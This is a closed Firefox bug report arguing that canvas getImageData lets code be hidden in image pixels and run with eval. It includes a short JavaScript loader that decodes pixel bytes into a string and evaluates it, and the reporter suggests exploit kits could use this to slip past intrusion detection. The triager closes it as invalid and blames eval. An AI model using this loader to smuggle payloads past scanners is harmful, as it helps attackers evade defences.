canvas getImageData opens security whole for code

RESOLVED INVALID

Status

()

Core
General
RESOLVED INVALID
6 years ago
6 years ago

People

(Reporter: Klaus Bertram, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

716 bytes, application/octet-stream
Details
(Reporter)

Description

6 years ago
Created attachment 683891 [details]
canvas.zip

User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Build ID: 20121025210744

Steps to reproduce:

With the canvas it is possible to read byte data out of an image.
Images himself can come from different urls (hosts) without restriction.
What happens when someone fill an image with code values as pixel data, load the image into an canvas and interpret it?
He could execute code without any knowledge of any security prevention because the "code" are an image.
What I've done is simple:
1. create an image where the pixel are the color representation of
  window['alert']('xss')
  this could be an gif, png... It depends of the color interpolation in the resulting image.
2. load the image into a web side
3. create an canvas object an put the image inside.
4. read the byte data of the canvas and cast it as string to eval
Eh viola

This is small js for it:
var img=new Image();
img.onload=function()
{
var ca = document.createElement('canvas');
ca.width=this.width;
ca.height=this.height;
var ctx = ca.getContext('2d');
ctx.drawImage(this,0,0);
var a="",d=ctx.getImageData(0, 0,this.width, this.height).data;
for(var i=0;i<d.length;i++){
if(d[i]<255) a+=String.fromCharCode(d[i]);
}
eval(a);
}
img.src="exploid.gif";


Actual results:

The alert box is displayed,
(Reporter)

Updated

6 years ago
OS: Linux → All
Hardware: x86_64 → All
Given https://www.w3.org/Bugs/Public/show_bug.cgi?id=20034 this is clearly not security-sensitive.

And further, it's invalid.  The security issue is in calling eval() on untrusted strings, which a web page can get in all sorts of ways, not in getImageData.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → INVALID
(Reporter)

Comment 2

6 years ago
Yes eval the real problem. But with this way there is no way for any intrusion detection systems to can text and code, because it's in an image.
So for something like BlackHole kit it would be easier to deliver any code without restriction to any prevention system.
You need to log in before you can comment on or make changes to this bug.